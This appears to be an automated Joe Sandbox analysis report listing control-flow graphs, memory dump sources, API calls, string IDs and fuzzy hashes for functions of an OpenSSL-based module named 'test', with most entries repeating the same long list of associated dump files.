                                                                                                                                                                control_flow_graph 1212 7ffd3fbe4e3f-7ffd3fcede70 call 7ffd3fbe1ef1 GetStdHandle 1216 7ffd3fcedee4-7ffd3fcedf05 call 7ffd3fcee2f0 1212->1216 1217 7ffd3fcede72-7ffd3fcede7d GetFileType 1212->1217 1223 7ffd3fcedf07 1216->1223 1224 7ffd3fcedf11-7ffd3fcedf2a call 7ffd3fbe1ef1 1216->1224 1217->1216 1218 7ffd3fcede7f-7ffd3fcededf call 7ffd3fbe12ee __stdio_common_vsprintf WriteFile 1217->1218 1226 7ffd3fcee15e-7ffd3fcee17c call 7ffd3fbe3a76 1218->1226 1223->1224 1229 7ffd3fcedf2c-7ffd3fcedf33 1224->1229 1230 7ffd3fcedf38-7ffd3fcedf4e MultiByteToWideChar 1224->1230 1232 7ffd3fcee0ab-7ffd3fcee0eb call 7ffd3fbe12ee __stdio_common_vswprintf call 7ffd3fbe23d3 1229->1232 1233 7ffd3fcedf54-7ffd3fcedf5a 1230->1233 1234 7ffd3fcee02d-7ffd3fcee033 1230->1234 1252 7ffd3fcee147-7ffd3fcee158 MessageBoxW 1232->1252 1253 7ffd3fcee0ed-7ffd3fcee100 RegisterEventSourceW 1232->1253 1236 7ffd3fcedf60-7ffd3fcedf64 1233->1236 1237 7ffd3fcee00d-7ffd3fcee010 1233->1237 1234->1232 1238 7ffd3fcee035-7ffd3fcee04e 1234->1238 1241 7ffd3fcedf6a-7ffd3fcedf83 1236->1241 1242 7ffd3fcee012-7ffd3fcee019 1236->1242 1237->1234 1237->1242 1239 7ffd3fcee050-7ffd3fcee056 1238->1239 1243 7ffd3fcee058-7ffd3fcee069 1239->1243 1244 7ffd3fcee0a3-7ffd3fcee0a9 1239->1244 1246 7ffd3fcedf85-7ffd3fcedf88 1241->1246 1247 7ffd3fcedf8e-7ffd3fcedfa8 1241->1247 1248 7ffd3fcee020-7ffd3fcee02b 1242->1248 1243->1244 1249 7ffd3fcee06b-7ffd3fcee07f 1243->1249 1244->1232 1244->1239 1246->1247 1246->1248 1251 7ffd3fcedfb0-7ffd3fcee00b 1247->1251 1248->1237 1249->1244 1251->1237 1251->1251 1252->1226 1253->1226 1254 7ffd3fcee102-7ffd3fcee145 ReportEventW DeregisterEventSource 1253->1254 1254->1226
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite__stdio_common_vsprintf__stdio_common_vswprintf
                                                                                                                                                                • String ID: $OpenSSL$OpenSSL: FATAL$no stack?
                                                                                                                                                                • API String ID: 2603057392-2963566556
                                                                                                                                                                • Opcode ID: 093cbe26eea9a5ba073ff7be4898ef82592068ef37d190a7ce1a14f29a33bb39
                                                                                                                                                                • Instruction ID: 973bf5ad7e953ddbd526bd5995371ed29bbe530dc455b4082567d2bc521dbc7f
                                                                                                                                                                • Opcode Fuzzy Hash: 093cbe26eea9a5ba073ff7be4898ef82592068ef37d190a7ce1a14f29a33bb39
                                                                                                                                                                • Instruction Fuzzy Hash: CF91D172B08B8A96EB248F24E8641AD7760FB55B95F444336EB5D07B95EF3CE284D300
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1255 7ffd3fbe1c1c-7ffd3fc91acc call 7ffd3fbe1ef1 1259 7ffd3fc91ace 1255->1259 1260 7ffd3fc91ad1-7ffd3fc91adc call 7ffd3fc93590 1255->1260 1259->1260 1263 7ffd3fc91b0c-7ffd3fc91b56 call 7ffd3fbe58df call 7ffd3fbe1fc3 1260->1263 1264 7ffd3fc91ade-7ffd3fc91b0b call 7ffd3fbe4057 1260->1264 1271 7ffd3fc91b5c-7ffd3fc91b63 1263->1271 1272 7ffd3fc91edf-7ffd3fc91ef4 call 7ffd3fbe3a67 1263->1272 1271->1272 1274 7ffd3fc91b69-7ffd3fc91b7a strcmp 1271->1274 1280 7ffd3fc91efc-7ffd3fc91f0d call 7ffd3fbe4057 1272->1280 1276 7ffd3fc91b80-7ffd3fc91bad call 7ffd3fbe58df call 7ffd3fbe1fc3 1274->1276 1277 7ffd3fc91e42-7ffd3fc91e53 strcmp 1274->1277 1295 7ffd3fc91e20-7ffd3fc91e3d call 7ffd3fbe3a67 1276->1295 1296 7ffd3fc91bb3-7ffd3fc91bba 1276->1296 1278 7ffd3fc91e55-7ffd3fc91e66 strcmp 1277->1278 1279 7ffd3fc91eb0-7ffd3fc91ecd call 7ffd3fbe3a67 call 7ffd3fc92ca0 1277->1279 1278->1279 1282 7ffd3fc91e68-7ffd3fc91eae call 7ffd3fbe4057 call 7ffd3fbe688e call 7ffd3fbe3a67 1278->1282 1291 7ffd3fc91f14-7ffd3fc91f37 1279->1291 1299 7ffd3fc91ecf-7ffd3fc91edd 1279->1299 1287 7ffd3fc91f12 1280->1287 1282->1287 1287->1291 1295->1280 1296->1295 1301 7ffd3fc91bc0-7ffd3fc91beb call 7ffd3fc93970 call 7ffd3fbe3a67 1296->1301 1299->1280 1309 7ffd3fc91dea-7ffd3fc91e1b call 7ffd3fbe4057 call 7ffd3fbe3a67 1301->1309 1310 7ffd3fc91bf1-7ffd3fc91bfc call 7ffd3fbe6226 1301->1310 1309->1287 1310->1309 1315 7ffd3fc91c02-7ffd3fc91c1e call 7ffd3fbe1fc3 call 7ffd3fc93590 1310->1315 1322 7ffd3fc91c20-7ffd3fc91c4f call 7ffd3fbe4057 call 7ffd3fbe3a67 1315->1322 1323 7ffd3fc91c54-7ffd3fc91c7f call 7ffd3fbe58df call 7ffd3fbe1fc3 1315->1323 1322->1287 1332 7ffd3fc91c85-7ffd3fc91c8c 1323->1332 1333 7ffd3fc91da6-7ffd3fc91de5 call 7ffd3fbe3a67 call 7ffd3fbe4057 call 7ffd3fbe3a67 1323->1333 1332->1333 1334 7ffd3fc91c92-7ffd3fc91ca3 strcmp 1332->1334 1333->1287 1336 7ffd3fc91ca5-7ffd3fc91cb6 strcmp 1334->1336 1337 7ffd3fc91d12-7ffd3fc91d32 call 7ffd3fbe3a67 call 7ffd3fc92ca0 1334->1337 1336->1337 1339 7ffd3fc91cb8-7ffd3fc91d0d call 7ffd3fbe4057 call 7ffd3fbe688e call 7ffd3fbe3a67 * 2 1336->1339 1351 7ffd3fc91d68-7ffd3fc91d6e 1337->1351 1352 7ffd3fc91d34-7ffd3fc91d63 call 7ffd3fbe4057 call 7ffd3fbe3a67 1337->1352 1339->1287 1355 7ffd3fc91d70-7ffd3fc91d8d call 7ffd3fbe1fc3 call 7ffd3fbe50bf call 7ffd3fbe697e 1351->1355 1356 7ffd3fc91d92-7ffd3fc91da1 call 7ffd3fbe3a67 1351->1356 1352->1287 1355->1291 1356->1291
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strcmp$strncmp
                                                                                                                                                                • String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
                                                                                                                                                                • API String ID: 1244041713-3630080479
                                                                                                                                                                • Opcode ID: 5c4a5fc11c0a7ead12ba8e651eaf5b2b00b3cfbdfac9d494fe84511c4692968e
                                                                                                                                                                • Instruction ID: 6fced7b3fcb30033d622327943790b28dcc64e51c9e48515a846d5ccae3f02e9
                                                                                                                                                                • Opcode Fuzzy Hash: 5c4a5fc11c0a7ead12ba8e651eaf5b2b00b3cfbdfac9d494fe84511c4692968e
                                                                                                                                                                • Instruction Fuzzy Hash: 98C1BFA1B4C64E81FA2CEB21B4A16BE6351AF85784F585032DB4D0778ADF3DE644F312
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ..\s\crypto\rand\randfile.c$Filename=$i
                                                                                                                                                                • API String ID: 0-1799673945
                                                                                                                                                                • Opcode ID: f7537f73f6dcab363935f305fb77117b11e50ba5bbe0b7dda00e0b6990df72fa
                                                                                                                                                                • Instruction ID: bfdcc154eca4f47c8d264458fce8f95c1700be663659dff3f50eba1c132b2bbf
                                                                                                                                                                • Opcode Fuzzy Hash: f7537f73f6dcab363935f305fb77117b11e50ba5bbe0b7dda00e0b6990df72fa
                                                                                                                                                                • Instruction Fuzzy Hash: 0251D662B0C64A92FA68DB22E8646BA2391EF80B80F440235DB1D47795EF3DE505E745
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: atoi$strcmp
                                                                                                                                                                • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                                                                                                                                • API String ID: 4175852868-1596076588
                                                                                                                                                                • Opcode ID: 1875cd00db0b90e4c0d86032d87d42243ef611fcc8a6360c4d15416524a2f1a6
                                                                                                                                                                • Instruction ID: f917f945bc20aa59fcc6265a7c8640483ad87cfc2c4200ec2473eea38a5962bc
                                                                                                                                                                • Opcode Fuzzy Hash: 1875cd00db0b90e4c0d86032d87d42243ef611fcc8a6360c4d15416524a2f1a6
                                                                                                                                                                • Instruction Fuzzy Hash: 6051E466B0A74F96EA0C9B29B4241B93391BF54B84F449031EF0E03792EE3CE446A741
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindowwcsstr
                                                                                                                                                                • String ID: Service-0x$_OPENSSL_isservice
                                                                                                                                                                • API String ID: 459917433-1672312481
                                                                                                                                                                • Opcode ID: 99dd96cfbefb6a8d05671be5233498e0afd2850c6e90bdb4439f43dff31dda30
                                                                                                                                                                • Instruction ID: 01c9c36949e77aa9f716892d07f4d79c4813134346b0c3654af7555b9abbcb65
                                                                                                                                                                • Opcode Fuzzy Hash: 99dd96cfbefb6a8d05671be5233498e0afd2850c6e90bdb4439f43dff31dda30
                                                                                                                                                                • Instruction Fuzzy Hash: 35416221B45B8A56EB589F34E8A026C2390FF547B4B485734EB7D467E4DF2CE544A310
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strncmp
                                                                                                                                                                • String ID: , value=$..\s\crypto\x509v3\v3_conf.c$/$ASN1:$DER:$critical,$name=
                                                                                                                                                                • API String ID: 1114863663-1429737502
                                                                                                                                                                • Opcode ID: 63a2bdf598e046781e79bdca1e8e452f79dda2babad14bbaf23e734bb40bd00f
                                                                                                                                                                • Instruction ID: bf517dc88a9efbda046aaf0d69819a9f9843283b73b04ce18f0bbb89e3b6ef2d
                                                                                                                                                                • Opcode Fuzzy Hash: 63a2bdf598e046781e79bdca1e8e452f79dda2babad14bbaf23e734bb40bd00f
                                                                                                                                                                • Instruction Fuzzy Hash: 1B410E62B0868A46FB189F22E82077A7B91BF95BD4F484130DF5D27785EE3DE504E701
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.231553845.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.231546310.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231553845.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231721315.00007FFD3FEFE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231730521.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.231738628.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd3fbe0000_test.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastsetsockopt
                                                                                                                                                                • String ID: ..\s\crypto\bio\b_sock2.c$o
                                                                                                                                                                • API String ID: 1729277954-1872632005
